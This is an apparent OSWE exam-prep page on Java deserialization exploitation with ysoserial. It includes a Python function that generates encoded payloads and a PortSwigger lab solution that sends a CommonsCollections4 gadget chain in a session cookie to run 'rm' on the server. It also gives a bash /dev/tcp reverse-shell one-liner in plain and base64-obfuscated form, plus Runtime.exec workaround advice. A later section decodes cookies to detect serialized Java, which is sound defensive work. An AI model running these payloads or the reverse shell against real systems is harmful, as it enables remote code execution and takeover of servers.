AWAE - OSWE Preparation / Resources
Ysoserial

Function

# Download ysoserial from https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

import subprocess
import base64
import urllib.parse

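def get_ysoserial_payload(command, payloadType, path_to_ysoserial='ysoserial.jar'):
    """Run ysoserial and return its output base64-encoded, then URL-encoded."""
    # ysoserial writes the raw serialized object to stdout
    proc = subprocess.check_output(['java', '-jar', path_to_ysoserial, payloadType, command])
    base64_payload = base64.b64encode(proc).decode()
    # URL-encode so '+', '/' and '=' survive transport in a cookie or query string
    urlEncoded_payload = urllib.parse.quote(base64_payload)
    return urlEncoded_payload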

payload = get_ysoserial_payload('command', 'payload')

Testing

Portswigger Labs (Spoiler)

import subprocess
import base64
import requests
import urllib.parse

def get_ysoserial_payload(command, payloadType, path_to_ysoserial='ysoserial.jar'):
    proc = subprocess.check_output(['java', '-jar', path_to_ysoserial, payloadType, command])
    base64_payload = base64.b64encode(proc).decode()
    urlEncoded_payload = urllib.parse.quote(base64_payload)
    return urlEncoded_payload

payload = get_ysoserial_payload('rm /home/carlos/morale.txt', 'CommonsCollections4')
print(payload)

req = requests.get('https://YOUR-SESSION.web-security-academy.net/', cookies={'session': payload})
print(req.text)
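
The value sent in the session cookie above is a Java serialization stream that has been base64-encoded and then URL-encoded, so the same chain can be reversed on the defensive side to flag such values in request logs. The following is an added example, not part of the original page: the function names, the watchlist prefix and the sample stream are assumptions constructed for illustration.

```python
import base64
import binascii
import re
import urllib.parse

STREAM_MAGIC = b"\xac\xed\x00\x05"  # Java serialization magic + stream version 5
# Assumed watchlist of package prefixes; tune it to what the application really uses.
WATCHLIST = ("org.apache.commons.collections",)

def decode_candidate(value):
    """Undo URL-encoding, then base64. Returns raw bytes, or None if not base64."""
    text = urllib.parse.unquote(value)
    try:
        return base64.b64decode(text + "=" * (-len(text) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None

def class_names(stream):
    """Class names declared by TC_CLASSDESC (0x72) records: u2 length + name."""
    names = []
    for m in re.finditer(rb"\x72(?=(..))", stream, re.DOTALL):
        length = int.from_bytes(m.group(1), "big")
        raw = stream[m.end() + 2:m.end() + 2 + length]
        if 0 < length == len(raw) and re.fullmatch(rb"[\w.$\[;]+", raw):
            names.append(raw.decode("ascii"))
    return names

def inspect_value(value):
    """Classify one cookie or parameter value taken from a request log."""
    raw = decode_candidate(value)
    if raw is None or not raw.startswith(STREAM_MAGIC):
        return {"java_serialized": False, "classes": [], "watchlisted": []}
    names = class_names(raw)
    hits = [n for n in names if n.startswith(WATCHLIST)]
    return {"java_serialized": True, "classes": names, "watchlisted": hits}

def _desc(name):
    # Constructed record: TC_OBJECT, TC_CLASSDESC, length, name, zeroed serialVersionUID.
    data = name.encode("ascii")
    return b"\x73\x72" + len(data).to_bytes(2, "big") + data + b"\x00" * 8

# Constructed sample: class descriptors only, not a complete or usable object stream.
SAMPLE_STREAM = STREAM_MAGIC + _desc("java.util.PriorityQueue") + _desc(
    "org.apache.commons.collections4.comparators.TransformingComparator")
SAMPLE_COOKIE = urllib.parse.quote(base64.b64encode(SAMPLE_STREAM).decode())

if __name__ == "__main__":
    print(inspect_value(SAMPLE_COOKIE))
    print(inspect_value("plain-session-id-1234"))
```

A match on the magic bytes alone is worth alerting on when the application has no reason to accept serialized Java in that field; the class-name list helps triage.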

Reverse shell Problem

echo "bash -i >& /dev/tcp/127.0.0.1/1234 0>&1" | base64
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMTIzNCAwPiYxCg==}|{base64,-d}|{bash,-i}
Last updated 4 years ago

When a command-execution payload fails because Runtime.getRuntime().exec() was given multiple commands, build the payload with this website: java.lang.Runtime.exec() Payload Workarounds - @Jackson_T. exec() does not pass the string through a shell, so pipes and redirections are not interpreted; the site rewrites the payload as separate brace-wrapped commands that bash supports, as in the second command line above.